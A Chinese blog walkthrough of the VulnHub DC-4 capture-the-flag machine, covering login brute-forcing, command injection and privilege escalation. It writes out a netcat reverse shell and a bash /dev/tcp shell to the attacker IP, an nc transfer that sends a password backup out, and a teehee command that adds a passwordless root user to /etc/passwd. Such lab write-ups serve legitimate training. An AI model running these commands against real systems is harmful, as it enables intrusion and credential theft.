首页 > 其他分享 >vulnhub-dc4

vulnhub-dc4

时间:2022-11-10 17:46:26浏览次数:40  
标签:爆破 jim 192.168 密码 vulnhub dc4 root bash

一.环境简介

靶机:192.168.56.106
攻击机:Windows10、kali(192.168.56.101)

二、渗透测试复现

1.信息收集

我这里提前已经知道我的靶机IP地址为192.168.56.1/24,因为kali与靶机同网段,也可以直接使用arp-scan -l来寻早靶机IP,我这里直接使用nmap来查找。
nmap 192.168.56.1/24 -sV -A

可以看到开放了22 与 80端口,首先看一下80端口上的web服务。

可以看到中间件为nginx1.15.10 ,编程语言为PHP,看看这个版本的nginx有无漏洞。没有漏洞

对于这种登录框,常见的渗透方法有

1、弱口令爆破
2、万能密码\SQL注入
3、后台未授权访问
4、组件未授权
5、其他功能点 (注册)(找回密码)
6、验证码问题
7、越权
......等等

2.弱口令爆破

这个我们来尝试弱口令爆破,有的人喜欢用户名和密码一起爆破,遇到这种管理后台,我比较喜欢将用户名设为admin,只去爆破密码(个人习惯)。

用户名密码为admin happy。

3.后台命令执行

在http://192.168.56.106/command.php 处,进行抓包。

发现命令执行漏洞,我们直接来反弹shell,这里使用bash+-c+'exec+bash+-i+&>/dev/tcp/192.168.56.101/9999 <&1是不行的,我们使用nc+-e+/bin/bash+192.168.56.101+9999
使用python -c 'import pty; pty.spawn("/bin/bash")'升级为交互式shell。

来看一下有啥有用的信息,查看下passwd看看有什么用户适合提权,这里可以看到charles、jim、sam有/bin/bash,那么就从这3个用户开始入手

在/home/jim/backups目录下发现老密码,可以用来爆破。

将密码复制下来 ,进行爆破。

# Kali
nc -nvlp 5555 > 1.txt

# DC4
nc 192.168.56.101 5555 < /home/jim/backups/old-passwords.bak

将密码存为密码本,我这里使用超级弱口令工具进行爆破。

直接ssh登录jim账号,看一下权限,仍然不是root。他会提示有新邮件,但是我上次已经打开了,所以这里不会再提示,他会告诉你charls账号密码。

charles

^xHhA&hvim0y

看一下权限,仍然不是root,无法打开root。

4.提权

4.1

这里不再讲其他的提权手段,直接看下charles的sudo。

可以看到使用teehee提权,teehee就是tee的变体从标准输入读取并写入标准输出和文件

我们可以借助teehee往passwd写入一个root账号即可得到root 权限。

echo "admin::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
成功拿到root权限

4.2

标签:爆破,jim,192.168,密码,vulnhub,dc4,root,bash
From: https://www.cnblogs.com/CHOSEN1-Z13/p/16877543.html

相关文章

  • Vulnhub My Tomcat靶机解题过程
    MyTomcat识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/My_Tomcat]└─$sudonetdiscover-ieth14CapturedARPReq/Reppackets,from3hosts.Totalsize:24......
  • Vulnhub My File Server 2靶机解题过程
    MyFileServer2识别目标主机IP地址──(kali㉿kali)-[~/Vulnhub/My_File_Server_2]└─$sudonetdiscover-ieth14CapturedARPReq/Reppackets,from3hosts.......
  • Vulnhub Infovore Vulnhub解题过程(部分)
    InfovoreVulnhub识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/infovore_vulnhub]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.63.0/16|Sc......
  • VulnHub-Lampiao-Walkthrough
    nmap扫描内网存活主机nmap-sP192.168.32.0/24我的靶机ip是192.168.32.135扫描端口nmap-sS-sV-A-p-192.168.32.135扫出来22、80、1898端口这里对80网站源码......
  • Vulnhub Funbox2靶机解题详细过程
    Funbox2识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Funbox2]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.116.0/16|ScreenView:Unique......
  • VulnHub-GoldenEye-1-Walkthrough
    靶机地址:https://www.vulnhub.com/entry/goldeneye-1,240/下载成功过后使用虚拟机打开需要注意:靶机和kail的网络适配器需要一致,不然会扫描不出来,这里我使用的的nat模式......
  • Vulnhub Backdoored靶机解题过程
    Backdoored识别目标主机IP地址把目标主机导入VirtualBox后,发现KaliLinux扫描不到目标主机的IP地址,因此需要首先解决没有自动获得IP地址的问题,解决过程见【靶机攻略】相......
  • Vulnhub THM Containme靶机解题过程
    THMContainmev4识别目标主机IP地址VirtualBox中启动THMContainme靶机kaliLinux利用netdiscover识别其IP地址:┌──(kali㉿kali)-[~/Vulnhub/THM_Containme]└─$......
  • Vulnhub NiveK靶机完整解题过程
    NiveK识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Nivek]└─$sudonetdiscover-ieth1Currentlyscanning:192.168.98.0/16|ScreenView:UniqueHost......
  • Vulnhub Jerome靶机解题过程(未完成)
    Jerome识别目标主机IP地址┌──(kali㉿kali)-[~/Vulnhub/Jerome]└─$sudonetdiscover-ieth1Currentlyscanning:172.16.95.0/16|ScreenView:UniqueHos......